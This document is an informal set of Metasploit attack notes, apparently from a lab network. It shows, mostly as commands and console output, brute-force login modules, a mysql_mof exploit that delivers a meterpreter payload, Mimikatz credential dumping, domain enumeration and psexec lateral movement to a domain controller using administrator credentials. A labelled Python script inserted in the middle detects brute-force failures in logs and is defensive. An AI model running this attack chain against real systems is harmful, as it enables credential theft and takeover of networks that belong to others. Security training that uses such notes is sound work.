Msf:
These notes are messy; they record the various msf modules for brute-forcing weak passwords.
Use the arp_scanner module to detect live hosts:
run post/windows/gather/arp_scanner RHOSTS=10.10.10.0/24
Add a route in metasploit
route add 10.10.1.3 255.255.255.0 1
Use the port scan module
use scanner/portscan/tcp
Brute-force ssh
Msf>use auxiliary/scanner/ssh/ssh_login
Brute-force ftp
Msf>use auxiliary/scanner/ftp/ftp_login
Brute-force telnet
Msf>use auxiliary/scanner/telnet/telnet_login
Brute-force smb
auxiliary/scanner/smb/smb_login
Brute-force MySQL
use scanner/mysql/mysql_login
msf auxiliary(scanner/mysql/mysql_login) > set USERNAME root
USERNAME => root
msf auxiliary(scanner/mysql/mysql_login) > set PASS_FILE /root/passlist.txt
PASS_FILE => /root/passlist.txt
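The login modules above (ssh, ftp, telnet, smb, MySQL) all leave the same footprint on the target: a burst of authentication failures from one source, often against several services and several usernames. As an added defender-side example (not part of the original notes), the following correlates constructed sshd, vsftpd and MySQL failure lines by source IP; the log formats, hostnames and addresses are constructed samples, and the threshold of 5 is an assumption to tune per environment.

```python
import re
from collections import defaultdict

# Constructed sample log lines (not real data): sshd and vsftpd entries as seen
# in syslog, plus MySQL "Access denied" entries as written to the error log.
SAMPLE_LOGS = """\
Jan 10 10:00:01 host sshd[1201]: Failed password for root from 10.10.1.50 port 40111 ssh2
Jan 10 10:00:02 host sshd[1202]: Failed password for root from 10.10.1.50 port 40112 ssh2
Jan 10 10:00:02 host sshd[1203]: Failed password for invalid user admin from 10.10.1.50 port 40113 ssh2
Jan 10 10:00:03 host vsftpd[1300]: [anonymous] FAIL LOGIN: Client "10.10.1.50"
Jan 10 10:00:04 host vsftpd[1301]: [root] FAIL LOGIN: Client "10.10.1.50"
2024-01-10T10:00:05.000000Z 12 [Note] Access denied for user 'root'@'10.10.1.50' (using password: YES)
2024-01-10T10:00:05.000000Z 13 [Note] Access denied for user 'root'@'10.10.1.50' (using password: YES)
Jan 10 10:00:09 host sshd[1210]: Failed password for alice from 10.10.1.77 port 50001 ssh2
Jan 10 10:00:10 host sshd[1211]: Accepted password for alice from 10.10.1.77 port 50002 ssh2
"""

# One pattern per service; each captures (username, source IP).
PATTERNS = {
    "ssh": re.compile(r"sshd\[\d+\]: Failed password for (?:invalid user )?(\S+) from (\d+\.\d+\.\d+\.\d+)"),
    "ftp": re.compile(r"vsftpd\[\d+\]: \[(\S+)\] FAIL LOGIN: Client \"(\d+\.\d+\.\d+\.\d+)\""),
    "mysql": re.compile(r"Access denied for user '([^']+)'@'(\d+\.\d+\.\d+\.\d+)'"),
}

def parse_failures(text):
    """Yield (service, user, source_ip) for every failed login in the log text."""
    for line in text.splitlines():
        for service, pat in PATTERNS.items():
            m = pat.search(line)
            if m:
                yield service, m.group(1), m.group(2)
                break  # a line belongs to exactly one service

def find_sprayers(text, threshold=5):
    """Return {source_ip: {"count", "services", "users"}} for every source whose
    failed logins, summed across all services, reach the threshold (assumed value)."""
    stats = defaultdict(lambda: {"count": 0, "services": set(), "users": set()})
    for service, user, ip in parse_failures(text):
        entry = stats[ip]
        entry["count"] += 1
        entry["services"].add(service)
        entry["users"].add(user)
    return {ip: entry for ip, entry in stats.items() if entry["count"] >= threshold}

if __name__ == "__main__":
    for ip, entry in find_sprayers(SAMPLE_LOGS).items():
        print(ip, entry["count"], sorted(entry["services"]), sorted(entry["users"]))
```

Summing failures across services is what separates a credential-spraying host from a user who simply mistyped a password once; a single-service counter would miss a source that spreads its attempts thinly.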
Use the mof module to gain access
use windows/mysql/mysql_mof
msf exploit(windows/mysql/mysql_mof) > set PASSWORD 123456
PASSWORD => 123456
msf exploit(windows/mysql/mysql_mof) > set rhost 10.10.1.3
rhost => 10.10.1.3
msf exploit(windows/mysql/mysql_mof) > set USERNAME root
USERNAME => root
msf exploit(windows/mysql/mysql_mof) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf exploit(windows/mysql/mysql_mof) > exploit
Dump hashes with Mimikatz
meterpreter > load mimikatz
meterpreter > kerberos
Some domain commands
List domains
net view /domain
List computers in the current domain
net view
List computers in the CORP domain
net view /domain:CORP
Ping the computer name to get its IP
ping Wangsong-PC
Get the list of all domain users
net user /domain
Get domain user group information
net group /domain
Get the current domain administrators
net group "domain admins" /domain
Show the domain time and the domain server's name
net time /domain
net time /domain reveals the domain computer name
WIN-723O786H6KU.moonsec.com 10.10.1.2 is the domain controller
net group "domain admins" /domain
Reverse shell
msf exploit(windows/smb/psexec) > set RHOST 10.10.1.2
RHOST => 10.10.1.2
msf exploit(windows/smb/psexec) > set SMBDomain moonsec
SMBDomain => moonsec
msf exploit(windows/smb/psexec) > set SMBUser administrator
SMBUser => administrator
msf exploit(windows/smb/psexec) > set SMBPass xxx123456..
SMBPass => xxx123456..
msf exploit(windows/smb/psexec) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf exploit(windows/smb/psexec) > exploit